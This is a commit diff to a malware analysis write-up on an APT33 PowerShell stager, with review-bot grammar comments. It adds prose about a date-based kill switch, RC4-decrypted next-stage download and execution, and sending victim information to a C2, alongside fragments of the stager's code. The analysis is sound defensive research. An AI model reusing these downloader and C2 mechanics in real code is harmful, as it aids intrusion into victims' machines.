Update Analysis APT33.md

StrangerealIntel 2019-11-16 21:58:25 +01:00 committed by GitHub
parent 2c74aee289
commit 450042f8f1
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23


@ -73,6 +73,8 @@ function DEC ($key,$enc)
} }
``` ```
<h6>The next function is used for check the local time and trigged a kill switch if this after the 12th December 2019. Once this check this setup the proxy settings if the version of the CLR is at least over the second version.</h6>
``` powershell ``` powershell
function Get-Webclient ($Cookie) function Get-Webclient ($Cookie)
{ {
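Review bot: the `<h6>` sentence added in this hunk needs a grammar pass before it ships: "is used for check the local time and trigged a kill switch if this after the 12th December 2019" reads better as "is used to check the local time and trigger a kill switch if the date is after 12 December 2019", and "Once this check this setup the proxy settings if the version of the CLR is at least over the second version" as "Once that check passes, it sets up the proxy settings if the CLR version is at least 2" (or "greater than 2"; "at least over" is ambiguous, so state the comparison the code actually makes). Minor style point: the opening fence here is written as "``` powershell" with a space, while the fence added in the next hunk is "```powershell"; pick one form for consistency.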
@ -116,6 +118,10 @@ function Get-Webclient ($Cookie)
if ($cookie) { $webclient.Headers.Add([System.Net.HttpRequestHeader]::Cookie, "SessionID=$Cookie") } if ($cookie) { $webclient.Headers.Add([System.Net.HttpRequestHeader]::Cookie, "SessionID=$Cookie") }
$webclient $webclient
} }
```
<h6> The main function is called 3 times for download the next stage of the payload, decode with the secret of the RC4 algorithm and execute it. By the same time send informations of the victim to C2 as new session created.</h6>
```powershell
function main function main
{ {
$cu = [System.Security.Principal.WindowsIdentity]::GetCurrent() $cu = [System.Security.Principal.WindowsIdentity]::GetCurrent()
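Review bot: the new `<h6>` paragraph in this hunk has the same wording problems: "is called 3 times for download the next stage of the payload, decode with the secret of the RC4 algorithm and execute it" should read "is called three times to download the next stage of the payload, decrypt it with the RC4 key (the $key passed to DEC) and execute it", and "By the same time send informations of the victim to C2 as new session created" should be "At the same time it sends information about the victim to the C2 as a newly created session". The visible context only shows the end of Get-Webclient and the first line of main, so consider adding one line saying where the three calls to main are made, so that the "three times" claim can be verified from the text.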